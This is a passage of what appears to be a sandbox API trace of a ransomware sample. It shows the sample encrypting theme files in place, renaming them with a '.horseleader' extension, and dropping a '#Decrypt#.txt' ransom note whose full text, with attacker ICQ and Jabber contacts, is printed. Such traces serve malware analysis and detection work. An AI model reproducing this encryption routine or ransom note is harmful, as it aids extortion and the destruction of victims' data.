ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb30e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="REFINED.ELM", cAlternateFileName="")) returned 1 [0247.659] lstrcmpiW (lpString1="REFINED.ELM", lpString2="Windows") returned -1 [0247.659] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0247.659] StrStrIW (lpFirst="REFINED.ELM", lpSrch=".horseleader") returned 0x0 [0247.659] lstrcmpW (lpString1="REFINED.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.659] lstrcmpW (lpString1="REFINED.ELM", lpString2="_uninstalling_.png") returned 1 [0247.659] lstrlenW (lpString=".testttjffg") returned 11 [0247.659] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM", lpSrch=".testttjffg") returned 0x0 [0247.659] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM") returned 79 [0247.660] StrStrW (lpFirst="REFINED.ELM", lpSrch=".txt") returned 0x0 [0247.660] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45838) returned 1 [0247.661] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.663] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.664] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.664] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.664] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.665] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x130e, lpOverlapped=0x0) returned 1 [0247.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffecf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x130e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x130e, lpOverlapped=0x0) returned 1 [0247.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.666] CloseHandle (hObject=0x1a4) returned 1 [0247.666] GetProcessHeap () returned 0x780000 [0247.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.666] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM.horseleader") returned 91 [0247.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm.horseleader")) returned 1 [0247.669] GetProcessHeap () returned 0x780000 [0247.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.669] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a84fa90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="REFINED.INF", cAlternateFileName="")) returned 1 [0247.669] lstrcmpiW (lpString1="REFINED.INF", lpString2="Windows") returned -1 [0247.669] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0247.669] StrStrIW (lpFirst="REFINED.INF", lpSrch=".horseleader") returned 0x0 [0247.669] lstrcmpW (lpString1="REFINED.INF", lpString2="#Decrypt#.txt") returned 1 [0247.669] lstrcmpW (lpString1="REFINED.INF", lpString2="_uninstalling_.png") returned 1 [0247.670] lstrlenW (lpString=".testttjffg") returned 11 [0247.670] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF", lpSrch=".testttjffg") returned 0x0 [0247.670] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0247.671] StrStrW (lpFirst="REFINED.INF", lpSrch=".txt") returned 0x0 [0247.671] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=586) returned 1 [0247.671] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.672] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.673] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.673] CloseHandle (hObject=0x1a4) returned 1 [0247.673] GetProcessHeap () returned 0x780000 [0247.674] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.674] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF.horseleader") returned 91 [0247.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf.horseleader")) returned 1 [0247.676] GetProcessHeap () returned 0x780000 [0247.676] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.676] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3d79, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.676] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.677] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0247.677] StrStrIW (lpFirst="THMBNAIL.PNG", 
lpSrch=".horseleader") returned 0x0 [0247.677] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.677] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.677] lstrlenW (lpString=".testttjffg") returned 11 [0247.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.678] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0247.678] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.678] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=15737) returned 1 [0247.678] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3d79, lpOverlapped=0x0) returned 1 [0247.680] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc287, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3d79, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3d79, lpOverlapped=0x0) returned 1 [0247.681] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.681] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.681] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.681] CloseHandle (hObject=0x1a4) returned 1 [0247.681] GetProcessHeap () returned 0x780000 [0247.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.horseleader") returned 92 [0247.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.horseleader")) returned 1 [0247.683] GetProcessHeap () returned 0x780000 [0247.683] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3d79, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.683] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.683] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\#Decrypt#.txt") returned 81 [0247.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.684] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.684] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.685] lstrlenA (lpString="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") returned 1368 [0247.685] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.685] CloseHandle (hObject=0x158) returned 1 [0247.685] GetProcessHeap () returned 0x780000 [0247.686] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0247.686] lstrcmpiW (lpString1="RICEPAPR", lpString2="Windows") returned -1 [0247.686] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned 68 [0247.686] lstrcmpW (lpString1="RICEPAPR", lpString2=".") returned 1 [0247.686] lstrcmpW (lpString1="RICEPAPR", lpString2="..") returned 1 [0247.686] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.686] GetProcessHeap () returned 0x780000 [0247.686] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.686] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*") returned 70 [0247.686] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.691] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\.") returned 70 [0247.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.692] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\..") returned 71 [0247.692] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0247.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.692] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xf82, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.692] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.692] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0247.692] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.692] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.692] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.692] lstrlenW (lpString=".testttjffg") returned 11 [0247.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.692] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0247.693] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.693] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3970) returned 1 [0247.693] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf82, lpOverlapped=0x0) returned 1 [0247.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff07e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.695] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf82, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf82, lpOverlapped=0x0) returned 1 [0247.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.695] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.696] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.696] CloseHandle (hObject=0x1a4) returned 1 [0247.696] GetProcessHeap () returned 0x780000 [0247.696] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.696] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 